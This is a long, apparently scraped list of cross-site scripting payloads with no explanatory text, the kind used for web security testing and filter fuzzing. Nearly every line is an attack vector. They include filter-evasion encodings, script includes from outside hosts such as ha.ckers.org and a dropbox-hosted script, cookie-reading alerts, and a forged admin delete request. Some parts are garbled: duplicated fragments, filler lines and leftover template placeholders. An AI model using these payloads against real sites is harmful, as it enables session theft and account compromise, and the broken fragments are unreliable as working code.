      <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
      a=\"get\";
      b=\"URL(\\"\";
      c=\"javascript:\";
      d=\"alert('XSS');\\")\";
      eval(a+b+c+d);
      <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
      <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
      </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
      <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
      <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
      <XML SRC=\"xsstest.xml\" ID=I></XML>
      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
      <HTML><BODY>
      <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
      <?import namespace=\"t\" implementation=\"#default#time2\">
      <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
      </BODY></HTML>
      <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
      <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
      <? echo('<SCR)';
      echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
      <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
      Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
      <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
      <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
      <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <A HREF=\"http://66.102.7.147/\">XSS</A>
      <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
      <A HREF=\"http://1113982867/\">XSS</A>
      <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
      <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
      <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
      <A HREF=\"//www.google.com/\">XSS</A>
      <A HREF=\"//google\">XSS</A>
      <A HREF=\"http://ha.ckers.org@google\">XSS</A>
      <A HREF=\"http://google:ha.ckers.org\">XSS</A>
      <A HREF=\"http://google.com/\">XSS</A>
      <A HREF=\"http://www.google.com./\">XSS</A>
      <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
      <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
      <
      %3C
      &lt
      <
      &LT
      &LT;
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      <
      \x3c
      \x3C
      \u003c
      \u003C
      <iframe src=http://ha.ckers.org/scriptlet.html>
      <IMG SRC=\"javascript:alert('XSS')\"
      <SCRIPT SRC=//ha.ckers.org/.js>
      <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
      <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
      <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
      <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <IMG SRC=\" javascript:alert('XSS');\">
      perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
      perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
      <IMG SRC=\"jav
      ascript:alert('XSS');\">
      <IMG SRC=\"jav
      ascript:alert('XSS');\">
      <IMG SRC=\"jav ascript:alert('XSS');\">
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
      <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
      <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
      <IMG SRC=javascript:alert("XSS")>
      <IMG SRC=JaVaScRiPt:alert('XSS')>
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=\"javascript:alert('XSS');\">
      <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
      '';!--\"<XSS>=&{()}
      ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
      ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
      '';!--"=&{()}





      alert("XSS")">

      <alert("XSS");//<
      a=/XSS/alert(a.source)
      \";alert('XSS');//
      alert("XSS");
      ¼script¾alert(¢XSS¢)¼/script¾




      @im\port'\ja\vasc\ript:alert("XSS")';

      exp/*

      a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

      document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
      TESTHTML5FORMACTION
      crosssitespt


      <img src="

      foo=">alert(1)">
      alert(1)">
      foo=">alert(1)">
      ({0:#0=alert/#0#/#0#(123)})
      ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
      Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
      {alert(1)};1
      crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
      alert(1)

      +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
      %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
      +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
      %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
      %253cscript%253ealert(document.cookie)%253c/script%253e
      “>alert(document.cookie)
      “>alert(document.cookie)
      “><alert(document.cookie);//<
      fooalert(document.cookie)
      ipt>alert(document.cookie)ipt>
      %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
      ‘; alert(document.cookie); var foo=’
      foo\’; alert(document.cookie);//’;
      alert(document.cookie)

      alert(1)
      ">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))

      ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
      '';!--"=&{()}
      0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"

      <marquee/onstart=alert()>
      <video/poster/onerror=alert()>
      <isindex/autofocus/onfocus=alert()>
      <SCRIPT SRC=http://ha.ckers.org/xss.js>





      xxs link
      xxs link
      alert("XSS")">












      <alert("XSS");//<

      <SCRIPT SRC=//ha.ckers.org/.j>
      <IMG SRC="javascript:alert('XSS')"
      <iframe src=http://ha.ckers.org/scriptlet.html <
      \";alert('XSS');//
      alert('XSS');
      alert("XSS");



      li {list-style-image: url("javascript:alert('XSS')");}

      • XSS


        @import'http://ha.ckers.org/xss.css';

        BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
        @im\port'\ja\vasc\ript:alert("XSS")';

        exp/*
        alert('XSS');
        .XSS{background-image:url("javascript:alert('XSS')");}

        BODY{background:url("javascript:alert('XSS')")}

        ¼script¾alert(¢XSS¢)¼/script¾




        echo('alert("XSS")'); ?>

        +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

        " SRC="http://ha.ckers.org/xss.js">

        '" SRC="http://ha.ckers.org/xss.js">
        ` SRC="http://ha.ckers.org/xss.js">

        document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
        XSS
        0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
        veris-->group
        element[attribute='
        [

        [" onmouseover="alert('RVRSH3LL_XSS');" ]
        %22;alert%28%27RVRSH3LL_XSS%29//
        javascript:alert%281%29;

        alert;pg("XSS")

        for((i)in(self))eval(i)(1)
        ipt>alert(1)ipt>ipt>alert(1)ipt>
        iPt>alert(1)IPt>
        test
        %253Cscript%253Ealert('XSS')%253C%252Fscript%253E








































































        ">

        ">123


        ">

        123

        ">

        123


        ">alert(`TEXT YOU WANT TO BE DISPLAYED`);

        123


        ">

        123


        >

        Hover the cursor to the LEFT of this Message

        &ParamHeight=250

        ">

        ">123


        ">

        123

        {font-family&colon;'<iframe/onload=confirm(1)>'
        <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
        <sVg><scRipt >alert&lpar;1&rpar; {Opera}
        <img/src=`` onerror=this.onerror=confirm(1)
        <form><isindex formaction="javascript&colon;confirm(1)"
        <img src=``&NewLine; onerror=alert(1)&NewLine;
        <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
        <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
        <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
        <script /**/>/**/alert(1)/**/</script /**/
        &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
        <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
        <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
        <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
        <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
        <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
        <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
        <form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
        <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
        <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
        <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
        http://www.google<script .com>alert(document.location)</script
        <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
        <img/src=@&#32;&#13; onerror = prompt('&#49;')
        <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
        <script ^__^>alert(String.fromCharCode(49))</script ^__^
        /**/alert(document.location)/**/

        /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
        X
        alert(0%0)

        <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
        <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
        &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
        &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
        <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
        <div/style="width:expression(confirm(1))">X</div> {IE7}
        <iframe// src=javaSCRIPT&colon;alert(1)
        //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
        /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
        //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
        </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

        |\>''alert&#x28;1&#x29; {Opera}
        <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
        <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
        <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
        <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
        <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
        <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
        <var onmouseover="prompt(1)">On Mouse Over</var>
        <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
        <img src="/" =_=" title="onerror='prompt(1)'">
        <%<!--'%><script>alert(1);

        X



        http://www.alert(1)
        alert(1)
        <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
        <img src=`xx:xx`onerror=alert(1)>
        <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
        <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
        <math><a xlink:href="//jsfiddle.net/t846h/">click
        <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
        <svg contentScriptType=text/vbs><script>MsgBox+1
        <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
        <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
        <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
        +-+-1-+-+alert(1)

        /*<script* */alert(1)//&NewLine;confirm(1);
        alert(1)
        <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
        <script x> alert(1) style="x:">
        <--` --!>

        x
        ">
        CLICKME
        click

        Click Me
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        '`"><\x3Cscript>javascript:alert(1)
        '`"><\x00script>javascript:alert(1)

        \x3Cscript>javascript:alert(1)
        '"`>/* *\x2Fjavascript:alert(1)// */
        javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)

        --> -->
        -->
        -->
        -->
        `"'>

        a='hello\x27;javascript:alert(1)//';


        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        /* *\x2A/javascript:alert(1)// */
        /* *\x00/javascript:alert(1)// */

        "'`>ABC

        DEF
        "'`>ABC
        DEF
        if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
        if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
        if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
        '`"><\x3Cscript>javascript:alert(1)
        '`"><\x00script>javascript:alert(1)
        "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
        "'`><\x00img src=xxx:x onerror=javascript:alert(1)>

        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        javascript:alert(1);
        ABC

        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        ABC
        DEF
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        test
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        "`'>\x3Bjavascript:alert(1)
        "`'>\x0Djavascript:alert(1)
        "`'>\xEF\xBB\xBFjavascript:alert(1)
        "`'>\xE2\x80\x81javascript:alert(1)
        "`'>\xE2\x80\x84javascript:alert(1)
        "`'>\xE3\x80\x80javascript:alert(1)
        "`'>\x09javascript:alert(1)
        "`'>\xE2\x80\x89javascript:alert(1)
        "`'>\xE2\x80\x85javascript:alert(1)
        "`'>\xE2\x80\x88javascript:alert(1)
        "`'>\x00javascript:alert(1)
        "`'>\xE2\x80\xA8javascript:alert(1)
        "`'>\xE2\x80\x8Ajavascript:alert(1)
        "`'>\xE1\x9A\x80javascript:alert(1)
        "`'>\x0Cjavascript:alert(1)
        "`'>\x2Bjavascript:alert(1)
        "`'>\xF0\x90\x96\x9Ajavascript:alert(1)
        "`'>-javascript:alert(1)
        "`'>\x0Ajavascript:alert(1)
        "`'>\xE2\x80\xAFjavascript:alert(1)
        "`'>\x7Ejavascript:alert(1)
        "`'>\xE2\x80\x87javascript:alert(1)
        "`'>\xE2\x81\x9Fjavascript:alert(1)
        "`'>\xE2\x80\xA9javascript:alert(1)
        "`'>\xC2\x85javascript:alert(1)
        "`'>\xEF\xBF\xAEjavascript:alert(1)
        "`'>\xE2\x80\x83javascript:alert(1)
        "`'>\xE2\x80\x8Bjavascript:alert(1)
        "`'>\xEF\xBF\xBEjavascript:alert(1)
        "`'>\xE2\x80\x80javascript:alert(1)
        "`'>\x21javascript:alert(1)
        "`'>\xE2\x80\x82javascript:alert(1)
        "`'>\xE2\x80\x86javascript:alert(1)
        "`'>\xE1\xA0\x8Ejavascript:alert(1)
        "`'>\x0Bjavascript:alert(1)
        "`'>\x20javascript:alert(1)
        "`'>\xC2\xA0javascript:alert(1)
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        javascript:alert(1)
        javascript:alert(1)
        javascript:alert(1)
        javascript:alert(1)
        javascript:alert(1)
        javascript:alert(1)
        javascript:alert(1)
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        ">
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        `"'>
        javascript:alert(1)<\x00/script>
        <img src=# onerror\x3D"javascript:alert(1)" >
        <input onfocus=javascript:alert(1) autofocus>
        <input onblur=javascript:alert(1) autofocus><input autofocus>
        <video poster=javascript:javascript:alert(1)//
        <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
        <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
        <video><source onerror="javascript:javascript:alert(1)">
        <video onerror="javascript:javascript:alert(1)"><source>
        <form><button formaction="javascript:javascript:alert(1)">X
        <body oninput=javascript:alert(1)><input autofocus>
        <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
        <frameset onload=javascript:alert(1)>
        <table background="javascript:javascript:alert(1)">
        <!--<img src="--><img src=x onerror=javascript:alert(1)//">
        <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
        <![><img src="]><img src=x onerror=javascript:alert(1)//">
        <style><img src="</style><img src=x onerror=javascript:alert(1)//">
        <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
        <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
        <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)

        alert(1)0


        document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

        <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
        <? foo="><script>javascript:alert(1)">
        javascript:alert(1)">
        foo=">javascript:alert(1)">
        foo=">">

        <% foo>

        d.innerHTML=d.innerHTML


































        XXX

        javascript:alert(1)//"

        `><img src=x:x onerror=javascript:alert(1)></a>


        X
        p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
        @import "data:,*%7bx:expression(javascript:alert(1))%7D";
        XXXXXX
        *[{}@import'%(css)s?]X

        XXX
        XXX
        / style=x:expression\28javascript:alert(1)\29>
        *{x:expression(javascript:alert(1))}

        X
        X
        with(document.getElementById("d"))innerHTML=innerHTML
        X
        X
        XXX
        #x{font-family:foo[bar;color:green;} #y];color:red;{}
        XXX
        ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
        ({0:#0=eval/#0#/#0#(javascript:alert(1))})
        ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
        Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
        &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
        &alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
        <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
        X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
        1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
        1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
        <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
        1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
        <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
        <x style="behavior:url(%(sct)s)">
        <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
        <event-source src="%(event)s" onload="javascript:alert(1)">
        <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
        <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
        <script>%(payload)s

        javascript:alert(1)


        <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
        <BODY ONLOAD=javascript:alert(1)>
        <BODY ONLOAD=javascript:javascript:alert(1)>
        <IMG SRC="jav ascript:javascript:alert(1);">
        <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
        <SCRIPT/SRC="%(jscript)s">
        <%(payload)s//<



        @import'%(css)s';

        li {list-style-image: url("javascript:javascript:alert(1)");}

        • XSS



          javascript:alert(1);
          .XSS{background-image:url("javascript:javascript:alert(1)");}
          BODY{background:url("javascript:javascript:alert(1)")}

          XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">

          +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
          X










































          @import'%(css)s';
          a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
          &&javascript:alert(1)&&;&&<&&/script&&>
          <SCRIPT onreadystatechange=javascript:javascript:alert(1);>

          javascript:alert(1);

          ]]

          test1
          test1

          ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
          alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
          >">'>alert(String.fromCharCode(88,83,83))
          '';!--"=&{()}






          xxs link
          xxs link
          alert("XSS")">











          perl -e 'print "";' > out

          <alert("XSS");//<

          <SCRIPT SRC=//ha.ckers.org/.j>
          <IMG SRC="javascript:alert('XSS')"
          <iframe src=http://ha.ckers.org/scriptlet.html <
          \";alert('XSS');//
          </TITLE><SCRIPT>alert("XSS");



          li {list-style-image: url("javascript:alert('XSS')");}

          • XSS


            @import'http://ha.ckers.org/xss.css';

            BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
            @im\port'\ja\vasc\ript:alert("XSS")';

            exp/*
            alert('XSS');
            .XSS{background-image:url("javascript:alert('XSS')");}

            BODY{background:url("javascript:alert('XSS')")}
            BODY{background:url("javascript:alert('XSS')")}

            ¼script¾alert(¢XSS¢)¼/script¾




            echo('alert("XSS")'); ?>

            Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

            +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

            " SRC="http://ha.ckers.org/xss.js">

            '" SRC="http://ha.ckers.org/xss.js">
            ` SRC="http://ha.ckers.org/xss.js">

            document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
            XSS
            XSS
            XSS
            XSS
            XSS
            XSS

            {font-family&colon;'<iframe/onload=confirm(1)>'
            <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
            <sVg><scRipt >alert&lpar;1&rpar; {Opera}
            <img/src=`` onerror=this.onerror=confirm(1)
            <form><isindex formaction="javascript&colon;confirm(1)"
            <img src=``&NewLine; onerror=alert(1)&NewLine;
            <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
            <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
            <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
            <script /**/>/**/alert(1)/**/</script /**/
            &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
            <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
            <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
            <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
            <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
            <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
            <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
            <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
            </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
            <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
            <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
            <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
            http://www.google<script .com>alert(document.location)</script
            <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
            <img/src=@&#32;&#13; onerror = prompt('&#49;')
            <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
            <script ^__^>alert(String.fromCharCode(49))</script ^__^
            /**/alert(document.location)/**/

            /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
            X
            alert(0%0)

            <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
            <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
